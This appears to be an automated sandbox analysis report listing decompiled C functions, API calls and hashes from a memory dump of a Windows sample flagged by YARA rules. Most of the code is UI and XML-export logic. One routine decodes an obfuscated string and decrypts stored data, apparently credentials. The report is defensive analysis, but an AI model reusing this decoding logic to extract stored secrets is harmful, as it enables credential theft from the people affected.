                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLastMessagesprintf
                                                                                              • String ID: Error$Error %d: %s
                                                                                              • API String ID: 1670431679-1552265934
                                                                                              • Opcode ID: 9a2ad0e70752bb447b178d956355c706b7f152369d8ca83d74a421e60f1b41e3
                                                                                              • Instruction ID: dfdfd8ae3da356d4892d02c8fdfc7d0b76dc1d64d686e07e92b09a376f71314b
                                                                                              • Opcode Fuzzy Hash: 9a2ad0e70752bb447b178d956355c706b7f152369d8ca83d74a421e60f1b41e3
                                                                                              • Instruction Fuzzy Hash: 9BF0A7B640010876CB10A764DC05FDA76BCAB44704F1440B6BA05E2141EAB4DB458FAC
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 68%
                                                                                              			E0040F037(intOrPtr _a4) {
                                                                                              				_Unknown_base(*)()* _t3;
                                                                                              				void* _t7;
                                                                                              				struct HINSTANCE__* _t8;
                                                                                              
                                                                                              				_t7 = 0;
                                                                                              				_t8 = LoadLibraryA("shlwapi.dll");
                                                                                              				_t3 = GetProcAddress(_t8, "SHAutoComplete");
                                                                                              				if(_t3 != 0) {
                                                                                              					_t7 =  *_t3(_a4, 0x10000001);
                                                                                              				}
                                                                                              				FreeLibrary(_t8);
                                                                                              				return _t7;
                                                                                              			}







                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,74EB48C0,00405C41,00000000), ref: 0040F040
                                                                                              • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040F04E
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0040F066
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                                                              • API String ID: 145871493-1506664499
                                                                                              • Opcode ID: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
                                                                                              • Instruction ID: e435a3077eadc7ffcc94e3fda903fcc6a6103b68d0c251917c13f6f883115a60
                                                                                              • Opcode Fuzzy Hash: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
                                                                                              • Instruction Fuzzy Hash: 70D0C2323002106B96605B326C0CAEB2D55EBC47527048032F505E1250EB648A86C1A8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 87%
                                                                                              			E00407406(char* __eax, intOrPtr* _a4, char _a8) {
                                                                                              				signed int _v8;
                                                                                              				int _v12;
                                                                                              				char* _v16;
                                                                                              				char _v20;
                                                                                              				signed int* _v24;
                                                                                              				char _v28;
                                                                                              				void _v284;
                                                                                              				char _v540;
                                                                                              				char _v1068;
                                                                                              				void _v3115;
                                                                                              				char _v3116;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				signed int _t35;
                                                                                              				signed int _t36;
                                                                                              				signed int _t40;
                                                                                              				signed int* _t61;
                                                                                              				char _t69;
                                                                                              				char* _t74;
                                                                                              				char* _t75;
                                                                                              				intOrPtr* _t76;
                                                                                              				signed int _t78;
                                                                                              				int _t80;
                                                                                              				void* _t83;
                                                                                              				void* _t84;
                                                                                              				signed int _t89;
                                                                                              
                                                                                              				_t74 = __eax;
                                                                                              				_t35 = strlen(__eax);
                                                                                              				_t78 = _t35;
                                                                                              				_t36 = _t35 & 0x80000001;
                                                                                              				if(_t36 < 0) {
                                                                                              					_t36 = (_t36 - 0x00000001 | 0xfffffffe) + 1;
                                                                                              					_t89 = _t36;
                                                                                              				}
                                                                                              				if(_t89 != 0 || _t78 <= 0x20) {
                                                                                              					return _t36;
                                                                                              				} else {
                                                                                              					_v3116 = 0;
                                                                                              					memset( &_v3115, 0, 0x7ff);
                                                                                              					_v8 = _v8 & 0x00000000;
                                                                                              					_t61 = _a4 + 4;
                                                                                              					_t40 =  *_t61 | 0x00000001;
                                                                                              					if(_t78 <= 4) {
                                                                                              						L7:
                                                                                              						_t79 =  &_v1068;
                                                                                              						E004046D7( &_v1068);
                                                                                              						if(E004047A0( &_v1068, _t93) != 0) {
                                                                                              							_v20 = _v8;
                                                                                              							_v16 =  &_v3116;
                                                                                              							_v28 = 0x10;
                                                                                              							_v24 = _t61;
                                                                                              							if(E00404811(_t79,  &_v20,  &_v28,  &_v12) != 0) {
                                                                                              								_t80 = _v12;
                                                                                              								if(_t80 > 0xff) {
                                                                                              									_t80 = 0xff;
                                                                                              								}
                                                                                              								_v540 = 0;
                                                                                              								_v284 = 0;
                                                                                              								memcpy( &_v284, _v8, _t80);
                                                                                              								_t27 =  &_a8; // 0x407626
                                                                                              								_t75 =  &_v540;
                                                                                              								 *((char*)(_t84 + _t80 - 0x118)) = 0;
                                                                                              								E004060D0(0xff, _t75,  *_t27);
                                                                                              								 *((intOrPtr*)( *_a4))(_t75);
                                                                                              								LocalFree(_v8);
                                                                                              							}
                                                                                              						}
                                                                                              						return E004047F1( &_v1068);
                                                                                              					}
                                                                                              					_t76 = _t74 + 5;
                                                                                              					_t83 = (_t78 + 0xfffffffb >> 1) + 1;
                                                                                              					do {
                                                                                              						_t69 = ( *((intOrPtr*)(_t76 - 1)) - 0x00000001 << 0x00000004 |  *_t76 - 0x00000021) - _t40;
                                                                                              						_t40 = _t40 * 0x10ff5;
                                                                                              						_t76 = _t76 + 2;
                                                                                              						_v8 = _v8 + 1;
                                                                                              						_t83 = _t83 - 1;
                                                                                              						_t93 = _t83;
                                                                                              						 *((char*)(_t84 + _v8 - 0xc28)) = _t69;
                                                                                              					} while (_t83 != 0);
                                                                                              					goto L7;
                                                                                              				}
                                                                                              			}































                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeLocalmemcpymemsetstrlen
                                                                                              • String ID: &v@
                                                                                              • API String ID: 3110682361-3426253984
                                                                                              • Opcode ID: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
                                                                                              • Instruction ID: 0225f7a5d6cb17f6a7661d1d380ab710e59dbb599c3936da0c6da93344c8566d
                                                                                              • Opcode Fuzzy Hash: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
                                                                                              • Instruction Fuzzy Hash: B731F772D0411DABDB10DB68CC81BDEBBB8EF45318F1001B6E645B3281DA78AE858B95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 84%
                                                                                              			E00409695(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                              				void _v259;
                                                                                              				char _v260;
                                                                                              				signed int _t34;
                                                                                              				char* _t45;
                                                                                              				void* _t47;
                                                                                              
                                                                                              				E00405EFD(_a4, "<item>\r\n");
                                                                                              				_t34 = 0;
                                                                                              				if( *((intOrPtr*)(__edi + 0x20)) > 0) {
                                                                                              					do {
                                                                                              						_v260 = 0;
                                                                                              						memset( &_v259, 0, 0xfe);
                                                                                              						E0040F09D( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4),  *((intOrPtr*)(__edi + 0x4c))),  *((intOrPtr*)(__edi + 0x50)));
                                                                                              						_t45 =  &_v260;
                                                                                              						E00409018(_t45,  *((intOrPtr*)(( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4) << 4) +  *((intOrPtr*)(__edi + 0x34)) + 0xc)));
                                                                                              						sprintf( *(__edi + 0x54), "<%s>%s</%s>\r\n", _t45,  *((intOrPtr*)(__edi + 0x50)), _t45);
                                                                                              						E00405EFD(_a4,  *(__edi + 0x54));
                                                                                              						_t47 = _t47 + 0x28;
                                                                                              						_t34 = _t34 + 1;
                                                                                              					} while (_t34 <  *((intOrPtr*)(__edi + 0x20)));
                                                                                              				}
                                                                                              				return E00405EFD(_a4, "</item>\r\n");
                                                                                              			}









                                                                                              APIs
                                                                                                • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
                                                                                              • memset.MSVCRT ref: 004096CB
                                                                                                • Part of subcall function 0040F09D: memcpy.MSVCRT ref: 0040F10B
                                                                                                • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                                                • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                                              • sprintf.MSVCRT ref: 00409710
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileWrite_strlwrmemcpymemsetsprintfstrcpystrlen
                                                                                              • String ID: <%s>%s</%s>$</item>$<item>
                                                                                              • API String ID: 3200591283-2769808009
                                                                                              • Opcode ID: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                                                              • Instruction ID: f0c093cdac9801847eaa7418f237768de61d650e358e632480a4b045718b8cde
                                                                                              • Opcode Fuzzy Hash: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                                                              • Instruction Fuzzy Hash: FE11E731500515BFC711AF25CC42E967B64FF04318F10006AF549369A2EB76BA64DFD8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00407BF9(void* __esi, struct HWND__* _a4, signed int _a8) {
                                                                                              				intOrPtr _v12;
                                                                                              				struct tagPOINT _v20;
                                                                                              				struct tagRECT _v36;
                                                                                              				int _t27;
                                                                                              				struct HWND__* _t30;
                                                                                              				struct HWND__* _t32;
                                                                                              
                                                                                              				_t30 = _a4;
                                                                                              				if((_a8 & 0x00000001) != 0) {
                                                                                              					_t32 = GetParent(_t30);
                                                                                              					GetWindowRect(_t30,  &_v20);
                                                                                              					GetClientRect(_t32,  &_v36);
                                                                                              					MapWindowPoints(0, _t32,  &_v20, 2);
                                                                                              					_t27 = _v36.right - _v12 - _v36.left;
                                                                                              					_v20.x = _t27;
                                                                                              					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
                                                                                              				}
                                                                                              				if((_a8 & 0x00000002) != 0) {
                                                                                              					E00406560(_t30);
                                                                                              				}
                                                                                              				return 1;
                                                                                              			}










                                                                                              APIs
                                                                                              • GetParent.USER32(?), ref: 00407C0B
                                                                                              • GetWindowRect.USER32 ref: 00407C18
                                                                                              • GetClientRect.USER32 ref: 00407C23
                                                                                              • MapWindowPoints.USER32 ref: 00407C33
                                                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00407C4F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$ClientParentPoints
                                                                                              • String ID:
                                                                                              • API String ID: 4247780290-0
                                                                                              • Opcode ID: 7bea04c1b6e52cb4f5c6b6cbc8acbaaab4948e977a1f04226da639ece1b7c51f
                                                                                              • Instruction ID: 06ac4e87c023cdd11bbb76a881eefb098f7857fbb12a9e12d40a619b69e20d01
                                                                                              • Opcode Fuzzy Hash: 7bea04c1b6e52cb4f5c6b6cbc8acbaaab4948e977a1f04226da639ece1b7c51f
                                                                                              • Instruction Fuzzy Hash: A7014C32800129BBDB119BA5DD89EFF7FBCEF46750F048129F901E2150D7B89541CBA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040A4C8(void* __eax) {
                                                                                              				void* __esi;
                                                                                              				void* _t16;
                                                                                              				void* _t33;
                                                                                              				void* _t38;
                                                                                              				void* _t41;
                                                                                              
                                                                                              				_t41 = __eax;
                                                                                              				_t16 = E00401033();
                                                                                              				if(_t16 == 0x5cb8) {
                                                                                              					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 0, 0);
                                                                                              					E00405E2C();
                                                                                              					 *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)) + 0x28)) = 0;
                                                                                              					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0x1009, 0, 0);
                                                                                              					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x5c))(_t38, _t33);
                                                                                              					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x74))(1);
                                                                                              					E0040A437(_t41);
                                                                                              					SetCursor( *0x416b98);
                                                                                              					SetFocus( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184));
                                                                                              					return SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 1, 0);
                                                                                              				}
                                                                                              				return _t16;
                                                                                              			}









                                                                                              APIs
                                                                                              • SendMessageA.USER32 ref: 0040A4F5
                                                                                                • Part of subcall function 00405E2C: LoadCursorA.USER32 ref: 00405E33
                                                                                                • Part of subcall function 00405E2C: SetCursor.USER32(00000000,?,0040BAC6), ref: 00405E3A
                                                                                              • SendMessageA.USER32 ref: 0040A518
                                                                                                • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A45D
                                                                                                • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A487
                                                                                                • Part of subcall function 0040A437: strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                                                                • Part of subcall function 0040A437: SendMessageA.USER32 ref: 0040A4C0
                                                                                              • SetCursor.USER32(?,?,0040B6B6), ref: 0040A53D
                                                                                              • SetFocus.USER32(?,?,?,0040B6B6), ref: 0040A54F
                                                                                              • SendMessageA.USER32 ref: 0040A566
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Cursor$sprintf$FocusLoadstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 2210206837-0
                                                                                              • Opcode ID: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                                                              • Instruction ID: 5ceab2a0550c6f7be61398745e2f8fe4621b0361104972d0b8848fcf02267a2c
                                                                                              • Opcode Fuzzy Hash: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                                                              • Instruction Fuzzy Hash: 12116DB1200600EFD722AB74DC85FAA77EDFF48344F0644B9F1599B2B1CA716D018B10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00409867(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                              				void _v259;
                                                                                              				char _v260;
                                                                                              				void _v515;
                                                                                              				char _v516;
                                                                                              				void* __esi;
                                                                                              				void* _t17;
                                                                                              				intOrPtr* _t26;
                                                                                              				char* _t28;
                                                                                              
                                                                                              				_t26 = __ecx;
                                                                                              				_v260 = 0;
                                                                                              				memset( &_v259, 0, 0xfe);
                                                                                              				_v516 = 0;
                                                                                              				memset( &_v515, 0, 0xfe);
                                                                                              				E00405EFD(_a4, "<?xml version=\"1.0\"  encoding=\"ISO-8859-1\" ?>\r\n");
                                                                                              				_t17 =  *((intOrPtr*)( *_t26 + 0x20))();
                                                                                              				_t28 =  &_v260;
                                                                                              				E00409018(_t28, _t17);
                                                                                              				sprintf( &_v516, "<%s>\r\n", _t28);
                                                                                              				return E00405EFD(_a4,  &_v516);
                                                                                              			}












                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040988A
                                                                                              • memset.MSVCRT ref: 004098A0
                                                                                                • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
                                                                                                • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                                                • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                                              • sprintf.MSVCRT ref: 004098D7
                                                                                              Strings
                                                                                              • <%s>, xrefs: 004098D1
                                                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 004098A5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                                              • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                              • API String ID: 3202206310-1998499579
                                                                                              • Opcode ID: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                                                              • Instruction ID: 66925a684df18266fce8bb701fa3a75b356ea9bacad4fe0319972b489c667c97
                                                                                              • Opcode Fuzzy Hash: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                                                              • Instruction Fuzzy Hash: BC01A77290011976D721A759CC46FDA7B6C9F44304F0400FAB509B3192DB789F858BA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 76%
                                                                                              			E00408572(void* __esi) {
                                                                                              				intOrPtr _t9;
                                                                                              				intOrPtr _t10;
                                                                                              				intOrPtr _t11;
                                                                                              				intOrPtr* _t18;
                                                                                              				void* _t19;
                                                                                              
                                                                                              				_t19 = __esi;
                                                                                              				_t9 =  *((intOrPtr*)(__esi + 0x24));
                                                                                              				if(_t9 != 0) {
                                                                                              					_push(_t9);
                                                                                              					L004115D6();
                                                                                              				}
                                                                                              				_t10 =  *((intOrPtr*)(_t19 + 0x34));
                                                                                              				if(_t10 != 0) {
                                                                                              					_push(_t10);
                                                                                              					L004115D6();
                                                                                              				}
                                                                                              				_t11 =  *((intOrPtr*)(_t19 + 0x1b4));
                                                                                              				if(_t11 != 0) {
                                                                                              					_push(_t11);
                                                                                              					L004115D6();
                                                                                              				}
                                                                                              				_t18 =  *((intOrPtr*)(_t19 + 0x1a0));
                                                                                              				if(_t18 != 0) {
                                                                                              					_t11 =  *_t18;
                                                                                              					if(_t11 != 0) {
                                                                                              						_push(_t11);
                                                                                              						L004115D6();
                                                                                              						 *_t18 = 0;
                                                                                              					}
                                                                                              					_push(_t18);
                                                                                              					L004115D6();
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_t19 + 0x1a0)) = 0;
                                                                                              				 *((intOrPtr*)(_t19 + 0x24)) = 0;
                                                                                              				 *((intOrPtr*)(_t19 + 0x34)) = 0;
                                                                                              				 *((intOrPtr*)(_t19 + 0x1b4)) = 0;
                                                                                              				return _t11;
                                                                                              			}









                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                                              • Instruction ID: 0a64c6e0650ef7a992325d71cca8afebdafc0e64b7e6075a64aa0ecb46f153ec
                                                                                              • Opcode Fuzzy Hash: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                                              • Instruction Fuzzy Hash: C2F0F4725057016FDB209F6A99C0497B7D6BB48714B64083FF18AD3741CF78AD818A18
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 70%
                                                                                              			E004085D8(intOrPtr* __edi) {
                                                                                              				void* __esi;
                                                                                              				void** _t7;
                                                                                              				intOrPtr* _t12;
                                                                                              				intOrPtr* _t18;
                                                                                              				intOrPtr _t21;
                                                                                              				intOrPtr _t22;
                                                                                              				intOrPtr _t23;
                                                                                              				intOrPtr _t24;
                                                                                              
                                                                                              				_t18 = __edi;
                                                                                              				 *__edi = 0x413320;
                                                                                              				E00408572(__edi);
                                                                                              				_t21 =  *((intOrPtr*)(__edi + 0x10));
                                                                                              				if(_t21 != 0) {
                                                                                              					E00406B5B(_t21);
                                                                                              					_push(_t21);
                                                                                              					L004115D6();
                                                                                              				}
                                                                                              				_t22 =  *((intOrPtr*)(_t18 + 0xc));
                                                                                              				if(_t22 != 0) {
                                                                                              					E00406B5B(_t22);
                                                                                              					_push(_t22);
                                                                                              					L004115D6();
                                                                                              				}
                                                                                              				_t23 =  *((intOrPtr*)(_t18 + 8));
                                                                                              				if(_t23 != 0) {
                                                                                              					E00406B5B(_t23);
                                                                                              					_push(_t23);
                                                                                              					L004115D6();
                                                                                              				}
                                                                                              				_t24 =  *((intOrPtr*)(_t18 + 4));
                                                                                              				if(_t24 != 0) {
                                                                                              					E00406B5B(_t24);
                                                                                              					_push(_t24);
                                                                                              					L004115D6();
                                                                                              				}
                                                                                              				_t12 = _t18;
                                                                                              				_t7 =  *((intOrPtr*)( *_t12))();
                                                                                              				free( *_t7);
                                                                                              				return _t7;
                                                                                              			}












                                                                                              APIs
                                                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
                                                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
                                                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
                                                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
                                                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004085F3
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00408606
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00408619
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040862C
                                                                                              • free.MSVCRT(00000000), ref: 00408640
                                                                                                • Part of subcall function 00406B5B: free.MSVCRT(00000000,00406DE2,00000000,?,?), ref: 00406B62
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??3@$free
                                                                                              • String ID:
                                                                                              • API String ID: 2241099983-0
                                                                                              • Opcode ID: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                                                              • Instruction ID: 9ddd328a78e70669a2f2a4495a49ad6ad9a3331e0dda25fcf26d4743fc91c851
                                                                                              • Opcode Fuzzy Hash: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                                                              • Instruction Fuzzy Hash: E3F0F6729028306BC9213B275011A8EB3657D4171431B056FF946BB7A28F3C6E9246FD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 19%
                                                                                              			E0040E81A(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, intOrPtr _a12) {
                                                                                              				void* __esi;
                                                                                              				void* _t11;
                                                                                              				void* _t26;
                                                                                              				void* _t27;
                                                                                              
                                                                                              				_t26 = __edx;
                                                                                              				_t11 = _a4 - 0x110;
                                                                                              				_t27 = __ecx;
                                                                                              				if(_t11 == 0) {
                                                                                              					E0040E4A4(__ecx, __ecx, __eflags);
                                                                                              					E00406491(_t26,  *((intOrPtr*)(__ecx + 4)));
                                                                                              					L5:
                                                                                              					return E004015AE(_t27, _a4, _a8, _a12);
                                                                                              				}
                                                                                              				if(_t11 != 0x28 || E004062D1(_a12) == 0) {
                                                                                              					goto L5;
                                                                                              				} else {
                                                                                              					SetBkMode(_a8, 1);
                                                                                              					SetBkColor(_a8, GetSysColor(5));
                                                                                              					SetTextColor(_a8, 0xc00000);
                                                                                              					return GetSysColorBrush(5);
                                                                                              				}
                                                                                              			}








                                                                                              APIs
                                                                                                • Part of subcall function 004062D1: memset.MSVCRT ref: 004062F1
                                                                                                • Part of subcall function 004062D1: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
                                                                                                • Part of subcall function 004062D1: _stricmp.MSVCRT(00000000,edit), ref: 00406316
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 0040E841
                                                                                              • GetSysColor.USER32(00000005), ref: 0040E849
                                                                                              • SetBkColor.GDI32(?,00000000), ref: 0040E853
                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 0040E861
                                                                                              • GetSysColorBrush.USER32(00000005), ref: 0040E869
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Color$BrushClassModeNameText_stricmpmemset
                                                                                              • String ID:
                                                                                              • API String ID: 1869857563-0
                                                                                              • Opcode ID: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
                                                                                              • Instruction ID: 70d3a7b2db974a4d4567ef1bfe72cf66993607b5e30e9ab541cb73924f0fe55d
                                                                                              • Opcode Fuzzy Hash: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
                                                                                              • Instruction Fuzzy Hash: 8CF01D32100205BBDF152FA6DD09E9E3F25EF08711F10C53AFA19A51E1CAB5D970DB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 82%
                                                                                              			E0040B105(intOrPtr __ecx, short _a4, short _a8) {
                                                                                              				char _v265;
                                                                                              				char _v520;
                                                                                              				char _v532;
                                                                                              				RECT* _v540;
                                                                                              				char _v560;
                                                                                              				intOrPtr _v564;
                                                                                              				char _v568;
                                                                                              				intOrPtr _v572;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				int _t54;
                                                                                              				void* _t77;
                                                                                              				short _t85;
                                                                                              				short _t86;
                                                                                              				RECT* _t97;
                                                                                              				intOrPtr _t104;
                                                                                              
                                                                                              				_t93 = __ecx;
                                                                                              				_t97 = 0;
                                                                                              				_t104 = __ecx;
                                                                                              				_v564 = __ecx;
                                                                                              				if(_a4 == 0 || _a4 == 1) {
                                                                                              					_t85 = _a8;
                                                                                              					if(_t85 == 0x9c42) {
                                                                                              						_t54 = DestroyWindow( *(_t104 + 0x108));
                                                                                              					}
                                                                                              					_t114 = _t85 - 0x9c49;
                                                                                              					if(_t85 == 0x9c49) {
                                                                                              						_t54 = E0040AEAA(_t93, _t97, _t104, _t114);
                                                                                              					}
                                                                                              					_t115 = _t85 - 0x9c59;
                                                                                              					if(_t85 == 0x9c59) {
                                                                                              						_t54 = E0040AE70(_t97, _t104, _t115);
                                                                                              					}
                                                                                              					_t116 = _t85 - 0x9c56;
                                                                                              					if(_t85 == 0x9c56) {
                                                                                              						_t54 = E0040ADB3(_t104, _t116);
                                                                                              					}
                                                                                              					if(_a8 == 0x9c58) {
                                                                                              						 *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) ^ 0x00000001;
                                                                                              						_t54 = E0040A27F(0, _t93, _t104, 0);
                                                                                              					}
                                                                                              					if(_a8 == 0x9c44) {
                                                                                              						_t54 = E0040AD9D(_t104);
                                                                                              					}
                                                                                              					if(_a8 == 0x9c43) {
                                                                                              						_v532 = 0x413560;
                                                                                              						E00401000(_t93,  &_v520, 0x412404);
                                                                                              						E00401000(_t93,  &_v265, 0x412440);
                                                                                              						_t104 = _v564;
                                                                                              						_push( *(_t104 + 0x108));
                                                                                              						_push( &_v532);
                                                                                              						_t77 = 0x70;
                                                                                              						E00401540(_t77);
                                                                                              						SetFocus( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
                                                                                              						_t20 =  &_v540; // 0x413560
                                                                                              						_t54 = E0040143D(_t20);
                                                                                              						_t97 = 0;
                                                                                              					}
                                                                                              					_t86 = _a8;
